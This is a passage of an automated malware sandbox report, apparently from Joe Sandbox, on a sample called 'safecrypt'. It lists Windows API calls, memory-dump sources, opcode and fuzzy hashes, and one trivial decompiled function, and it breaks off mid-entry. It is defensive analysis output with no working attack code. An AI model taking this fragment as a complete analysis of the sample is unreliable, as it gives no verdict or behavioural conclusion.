                    • Opcode ID: c1e8bde57aee020fc9c60378a3bfaf65363eb9432a64a9b0c489f9f69b63b323
                    • Instruction ID: 037c3d0e586196937e097fe85d47cdedf6411bb0dcd8e57aa3c72dcea3997cd9
                    • Opcode Fuzzy Hash: c1e8bde57aee020fc9c60378a3bfaf65363eb9432a64a9b0c489f9f69b63b323
                    • Instruction Fuzzy Hash: CDE08665E1841199AF2DF3B15D0147E755B6BC3719700678CD057D41C0EE7847074567
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 1f9d2f406c2fea38e7ed867162859e11e945b7f4c53d93314fe411acd05b36f1
                    • Instruction ID: eaccb762ed46f08995ba1956749575e5fd844b083270d418e8d3d586b1990dfe
                    • Opcode Fuzzy Hash: 1f9d2f406c2fea38e7ed867162859e11e945b7f4c53d93314fe411acd05b36f1
                    • Instruction Fuzzy Hash: 09E026228045646DEB16B7B88E1227C3A069B40304F102F2CC067931A2CE220A0B08A7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 5ce89155a9d0d642553cd5d1d691cc82c29113df743b0b59486fa57b36f6d429
                    • Instruction ID: bd625b7b8710466b253cc15c79c95b44ac83fe69ad7fed13c34e1bb026fd7a87
                    • Opcode Fuzzy Hash: 5ce89155a9d0d642553cd5d1d691cc82c29113df743b0b59486fa57b36f6d429
                    • Instruction Fuzzy Hash: A1D05E76999881582B2DB3B15C3283E288EAAC0B3A301AB0D9423941D5EC680607447B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ChangeCloseFileFindNotificationRead
                    • String ID:
                    • API String ID: 1200561807-0
                    • Opcode ID: 53f2ba922466132cbb0b76afe212b52718d022069b773bc82a210bf8672d787c
                    • Instruction ID: ebef764636a052ae8f452cd9686b422a5734a2c4013ed385d7e5db91ba21fd72
                    • Opcode Fuzzy Hash: 53f2ba922466132cbb0b76afe212b52718d022069b773bc82a210bf8672d787c
                    • Instruction Fuzzy Hash: D7D0A7351696504EDF1EBBB01A5243D3E169B83605314ABDDC117448E3CD2686035805
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 57e0bf374b90b6fcecd768e28653a4ce8691a1f7236897c038de2e8a6dbd967b
                    • Instruction ID: 019d0e60bd039fd1810b5cfeacc61b5fec184303d4693e1fb1fdf3fc9cc04914
                    • Opcode Fuzzy Hash: 57e0bf374b90b6fcecd768e28653a4ce8691a1f7236897c038de2e8a6dbd967b
                    • Instruction Fuzzy Hash: 54D0C9B6A98851A97B2DB3B15D3283E288F6AD171A305AB1D9403C8145ED68060B487B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ChangeCloseFileFindNotificationRead
                    • String ID:
                    • API String ID: 1200561807-0
                    • Opcode ID: 16d01db0c5107b380cbd906b4d7e195e901270f65508c29fc449c5ea51d449b7
                    • Instruction ID: 8772bfaca92426e34700edab6e5d88881982de18e5cb86d4e902e856a2a61c82
                    • Opcode Fuzzy Hash: 16d01db0c5107b380cbd906b4d7e195e901270f65508c29fc449c5ea51d449b7
                    • Instruction Fuzzy Hash: F1D01229118A400ADE2ABBB15B7653D3E16EB83705B24BFCDC127445A3CD669B07A84A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: cd313ec640d03c0afd1ac13d35e3902a6b72c2ee7a84630c48733ee02e280b7d
                    • Instruction ID: affddc76cda8581bacb71542ce95b849105c8ba41d0c0971355876dcdb0d3dab
                    • Opcode Fuzzy Hash: cd313ec640d03c0afd1ac13d35e3902a6b72c2ee7a84630c48733ee02e280b7d
                    • Instruction Fuzzy Hash: F5D02224C08664BDE77375B88F007BC3E836B59340F140F28D06F872A2CA02464B85B3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: c68cbe7e80cc2d0bd955f4f7a5547f1a08041d3f25668557ccdd1799c90d50f7
                    • Instruction ID: bd20b92a0b3790b40aa40dfa59ec5cb3288d8794f7dd5c991730d615062224fb
                    • Opcode Fuzzy Hash: c68cbe7e80cc2d0bd955f4f7a5547f1a08041d3f25668557ccdd1799c90d50f7
                    • Instruction Fuzzy Hash: D4D0A935E1802049CB1CFB7068420BD32220B83B28B00639CC02A920C0DF3083034902
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 1bd418a1a0c1aecc70abcd99eabf37fd1b66588c424d4c1ff54a6ff2b8515ad9
                    • Instruction ID: 8e27bfc544583eda9e08c6c38578d099dbb46afef5096e1f16332e3ed91d1f6e
                    • Opcode Fuzzy Hash: 1bd418a1a0c1aecc70abcd99eabf37fd1b66588c424d4c1ff54a6ff2b8515ad9
                    • Instruction Fuzzy Hash: 76C08075D0411045CF1CF7716D511BD73214F83728F10679DC036910C0DF3497074942
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 16%
                    			E00441E24(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                    
                    				_push(_a16);
                    				_push(_a12);
                    				_push(_a8);
                    				_push(_a4);
                    				L00441E7C(); // executed
                    				return __eax;
                    			}



                    0x00441e24
                    0x00441e28
                    0x00441e2c
                    0x00441e30
                    0x00441e34
                    0x00441e39

                    APIs
                    • #1576.MFC42(00441B7A,00441B7A,00441B7A,00441B7A,00441B7A,00000000,?,0000000A), ref: 00441E34
                    Memory Dump Source
                    • Source File: 00000000.00000002.325756086.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.325749384.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.325794672.0000000000442000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.325826185.0000000000474000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.325834815.0000000000475000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.325862733.000000000086F000.00000002.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_safecrypt.jbxd
                    Similarity
                    • API ID: #1576
                    • String ID:
                    • API String ID: 1976119259-0
                    • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                    • Instruction ID: 9951792e5f65cba84744b8241d46eb1ba3a33096f7a81e5f749b2ad7617d2520
                    • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                    • Instruction Fuzzy Hash: ACB0083A018386ABDB02DE91880192ABAA6BF98304F584C1DB6A10107187668468AB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: e03bf6073e2973dbd938e586e03bd19101dba163028696116d509b4f8e9cb134
                    • Instruction ID: 9a043ad61b7c9ebb990ada4959fb05952dd03a4bd7f1210d08aea783b6896937
                    • Opcode Fuzzy Hash: e03bf6073e2973dbd938e586e03bd19101dba163028696116d509b4f8e9cb134
                    • Instruction Fuzzy Hash: 84A00223604510054909BBF55D7305D55078FC0604B01AE2EC02385096CD3D570B485B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 213718747aa00cf834fec87a8a1e3165e1d499cdf6dc26a96c939c6725be76ee
                    • Instruction ID: 930805c6fa702f93b21f617f486c08459d43b8888592f950b317918ca1cc6419
                    • Opcode Fuzzy Hash: 213718747aa00cf834fec87a8a1e3165e1d499cdf6dc26a96c939c6725be76ee
                    • Instruction Fuzzy Hash: AC418770D18212EEEF1E77708C11A7D36AABB83B41F149BEDD04FA9041EE350647C94A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: bd4d4b1ad84da1ffb4e851fa152b745fab45bf4bea23ce4f0b5c90c3c3cc9ce5
                    • Instruction ID: 9703344db3cb095051ce6efc1dc25100d8960384968a02eb9fec0f971c61d7c3
                    • Opcode Fuzzy Hash: bd4d4b1ad84da1ffb4e851fa152b745fab45bf4bea23ce4f0b5c90c3c3cc9ce5
                    • Instruction Fuzzy Hash: 0C41F626A78502EDEB2D77758D15E3A388EBB80705F049F1DA103D91D1FE7A450FC466
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 0b1c24d18696a5bdad6b6979bdd6fb1721c59d8b72c7ee121802c1c46498a521
                    • Instruction ID: 57de878a01f4bc36a02dc224a112acdb7bfd4c3640ee2b3f43b9b5acf0b58b39
                    • Opcode Fuzzy Hash: 0b1c24d18696a5bdad6b6979bdd6fb1721c59d8b72c7ee121802c1c46498a521
                    • Instruction Fuzzy Hash: F8414636918505DDEB0DFBA48D41B397A99FB80708F05EF1DD003AB252EEB4490ECA15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: ad651bb21791e9a7c691c5cd863c20b6a0880cca9b2228f769de18364964c4a0
                    • Instruction ID: 74ec15cadf09c96d9dd94f4cb35e3c714a8628114ef3042f1971970400221b93
                    • Opcode Fuzzy Hash: ad651bb21791e9a7c691c5cd863c20b6a0880cca9b2228f769de18364964c4a0
                    • Instruction Fuzzy Hash: 84410726A78502EDFB2E77718C16A3A788ABB80715F049F1D9003991D6FE7A450FC456
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: de84cf29a8fd62ce38a3ac7031759c7eee9bf8c35c0b50143f56c40a00e56bd0
                    • Instruction ID: 087fdd147e5cc61501155633a269a8ef5c31dbd4754e64535cecc7b62208c82d
                    • Opcode Fuzzy Hash: de84cf29a8fd62ce38a3ac7031759c7eee9bf8c35c0b50143f56c40a00e56bd0
                    • Instruction Fuzzy Hash: A2414776918605DDEB0DFBA08D81E397A9AFB80708F05EF1DD003AB152EEB5450FCA55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 1d645604c1a1c404572dfb6f431631895a4ee39c39789d6fee0d256497b66a6b
                    • Instruction ID: 2cd7f2baf993791c72aec70aa5be8da115d55c6bc02d3afaea62e9b1bf3e80d7
                    • Opcode Fuzzy Hash: 1d645604c1a1c404572dfb6f431631895a4ee39c39789d6fee0d256497b66a6b
                    • Instruction Fuzzy Hash: B5417736918101DDEB09FBA08D41E3D7A9AFB81708F05EF1DD003AB252EE75450FCA05
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 0d28287d4a7922abe7909f51270f5554bb3293ed60572856a366e73dcb79f7c4
                    • Instruction ID: c20ef881b15719f3e58637efc67c31e016221033d73b469ad84025eb83e718ad
                    • Opcode Fuzzy Hash: 0d28287d4a7922abe7909f51270f5554bb3293ed60572856a366e73dcb79f7c4
                    • Instruction Fuzzy Hash: D4312726639402EDFB2E77708C16E3B388EAB81705F049F1DA003981D2FD7A050FC466
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: b4c3bc4f3a09729fe90bf56ebf48325c39a14f480c1811398c4fdfe6c6f78867
                    • Instruction ID: f9679b2a666d76d17845630337120638f495f8faf01598633140d1b65a557576
                    • Opcode Fuzzy Hash: b4c3bc4f3a09729fe90bf56ebf48325c39a14f480c1811398c4fdfe6c6f78867
                    • Instruction Fuzzy Hash: 3D411736A14505CEEB1DFFA4C981F29B699FB80704F05DF2AC103DB196EEB5850EC645
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 78c4ce668bc14a0a7c077f3898c933bbd72d75491040a00ab9aa3b05715fdd6e
                    • Instruction ID: c4bce8171c7412b2941d059aca21b9dc2911bb6db29bda6f33328aaafb7c8267
                    • Opcode Fuzzy Hash: 78c4ce668bc14a0a7c077f3898c933bbd72d75491040a00ab9aa3b05715fdd6e
                    • Instruction Fuzzy Hash: 5B313B26A38402EDFB2D77714C16E3B788EAB81705B04AF1D9003D91D2FD7A460FC4A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 6c812450da667ef91aa4bc36ec31cf22562c813e5ce016a74f244c84a4aabfb6
                    • Instruction ID: dc7a8d0d9aaf8ff449cadbfea5f3483167299f1df380878a64f9489369cded20
                    • Opcode Fuzzy Hash: 6c812450da667ef91aa4bc36ec31cf22562c813e5ce016a74f244c84a4aabfb6
                    • Instruction Fuzzy Hash: A9312826A38402ADFB2D77718C15E3B388EAB80705B04AF1D9003D91D1FD7A460FC4A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 69810937cf8dd6d7afae2f3226f39df04c8055b5bb7d317543c1862063685c98
                    • Instruction ID: 970a109465b302f3a8397f51145e9b9f079a2ff7a9b8fd931791b1dce98caecd
                    • Opcode Fuzzy Hash: 69810937cf8dd6d7afae2f3226f39df04c8055b5bb7d317543c1862063685c98
                    • Instruction Fuzzy Hash: A8412576918505DDEB09FBA08D81A3D7AAAFB80708F05EF19D003AB252EEB5450ECA55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: bd82761a7e9e02252aa2f9ec55eb709cd45bec63b6dbd02af8a1014cf890b8d8
                    • Instruction ID: f65f4b3e006602567fd51845f1b6671a6909ea01a5c98bce74233803d4afc9f4
                    • Opcode Fuzzy Hash: bd82761a7e9e02252aa2f9ec55eb709cd45bec63b6dbd02af8a1014cf890b8d8
                    • Instruction Fuzzy Hash: 10310A26679502ADFB2D77758C16A3F794AAB80705F049F1D9003D90D1FE3A560FC496
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 5c7978ccfa3aab9bb2358254a7b511aeb87a74bc646464c4e8df82c8fd74f9c4
                    • Instruction ID: 9dc46e5bad5afddaaa2e1dd6676edd4c92b62d258b77a697a2af97ecb93535df
                    • Opcode Fuzzy Hash: 5c7978ccfa3aab9bb2358254a7b511aeb87a74bc646464c4e8df82c8fd74f9c4
                    • Instruction Fuzzy Hash: 05315976918105CDDB09FBA08981B2C7AA9FB40708F05DF19C1039B1A3DF75850ECB45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 3617754d708ab19d5d167dcbb6069d3b98ae991bd22f4f12e4c7058a7527c55a
                    • Instruction ID: 19be0c6e0bc510e181647dfa6350c255b2c389ef1cd633f1cd29eebd16c00253
                    • Opcode Fuzzy Hash: 3617754d708ab19d5d167dcbb6069d3b98ae991bd22f4f12e4c7058a7527c55a
                    • Instruction Fuzzy Hash: 83312927638502ADFB2D77758C16E3B788AAB80705F04AF1D9003D90D1FE3A560FC4A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: b8e8fb016d8de286ceab7fcc401d983151fd6e590f9a097f5807e2646bb6db09
                    • Instruction ID: 2f8d3c42bbb22f6bfd3ecfb294976e3f4329f8d22c2b67b919e6e8ad47b8bda5
                    • Opcode Fuzzy Hash: b8e8fb016d8de286ceab7fcc401d983151fd6e590f9a097f5807e2646bb6db09
                    • Instruction Fuzzy Hash: 07314876908605CDDB09FBA48981B2DBAA9FB40708F05EF19C107AB163DFB5850ECB45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 41728e643d91c63cc06e9eb38a5aa92b4827d6ea1a926a6d512a1ea13076a8ea
                    • Instruction ID: 1d4b5002e361ea5f7f5ecd00f19e172cdea00d7da562892f9d5cf9fa1d4c7134
                    • Opcode Fuzzy Hash: 41728e643d91c63cc06e9eb38a5aa92b4827d6ea1a926a6d512a1ea13076a8ea
                    • Instruction Fuzzy Hash: 8D210C36A38502DDEB2D77748C15A3A758ABB80705F049F1DD003D91D1FE7A450FC896
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 3f3c0cb22216bc1d4d37d73cb1b76a3ec2d58828a5ea3753d9766b42e69312e0
                    • Instruction ID: 9e568ab0dcaeea7701110ff23650e6e777fd0854d4210915089246f22bc1b7ee
                    • Opcode Fuzzy Hash: 3f3c0cb22216bc1d4d37d73cb1b76a3ec2d58828a5ea3753d9766b42e69312e0
                    • Instruction Fuzzy Hash: A421F826578502ADEB2E76748C16A3B788ABB80B45F04AF1D9003D91D2FE7A460FC496
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 71561392d4d8067ff90444031261ce5e75ba335fe1b5180300fa67dc93fbc04b
                    • Instruction ID: b325e792823e84c57a7c176abb6e8f173238e4a2b1daf6999ba9ab34077eaa35
                    • Opcode Fuzzy Hash: 71561392d4d8067ff90444031261ce5e75ba335fe1b5180300fa67dc93fbc04b
                    • Instruction Fuzzy Hash: E5313176914105DEEB09FFA48D80E29BAA9FB80308F55DF19C107AB267EBB5450ECB04
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 5a9244b7db617b6d444f9f4c58634c16109b38a375df11579253416b8934bc97
                    • Instruction ID: 8cded002dbc44ee3def8e72035dde3ec79086c44571b65bbeb3cca29077f56e3
                    • Opcode Fuzzy Hash: 5a9244b7db617b6d444f9f4c58634c16109b38a375df11579253416b8934bc97
                    • Instruction Fuzzy Hash: 73212927539502ADEB2E77748C1693B798ABB81715B04AF1D9003D41D2FE3A560FC4A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 743db1ef30ed4ad0898f61bb3235822ef16331a2eca99231dc703896e40b9f58
                    • Instruction ID: 8e2faff69b67ca24e72372c870af88e18787bc2b6e74811580161212d3edc689
                    • Opcode Fuzzy Hash: 743db1ef30ed4ad0898f61bb3235822ef16331a2eca99231dc703896e40b9f58
                    • Instruction Fuzzy Hash: 06214775945105CEDB09FFA4C980E2DBAA9FB81308F15DF19C0079B2A7EBB5450ECB05
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: fedd77173f0f68c5afddafd12f9c380183e137179cf39233f9161bd744f89064
                    • Instruction ID: 315ef205d74f25f6bd22bcfe7c6dac3738d28ea8a6ce121d8128160dccef875d
                    • Opcode Fuzzy Hash: fedd77173f0f68c5afddafd12f9c380183e137179cf39233f9161bd744f89064
                    • Instruction Fuzzy Hash: DB210A27938502ADEB2D77758D1AE3B788EBB81705B04AF1D9003D81D6FE69460FC4A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    • Opcode ID: 51de3e645f225c32ace66936091dc14c7e19af588d1765a9ff836c4638613e73
                    • Instruction ID: 95f45580450b9ac4f5790e1ae49e048a2bed140d68a6c10e464c09ca2cd04b76
                    • Opcode Fuzzy Hash: 51de3e645f225c32ace66936091dc14c7e19af588d1765a9ff836c4638613e73
                    • Instruction Fuzzy Hash: D6216772904105CEDB09FFA0CD81E6DBAA9FB81308F15DB19C0079B257EBB5450ECB05
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: a4ddb456e16d676d7ddad0bf632ab18ea0a3fab2c526f2f4fad18b46aefe225a
                    • Instruction ID: 11cc1f9a59678e20d09af1bdc6313723eb3bd235d3b6caeebf318dee2473def8
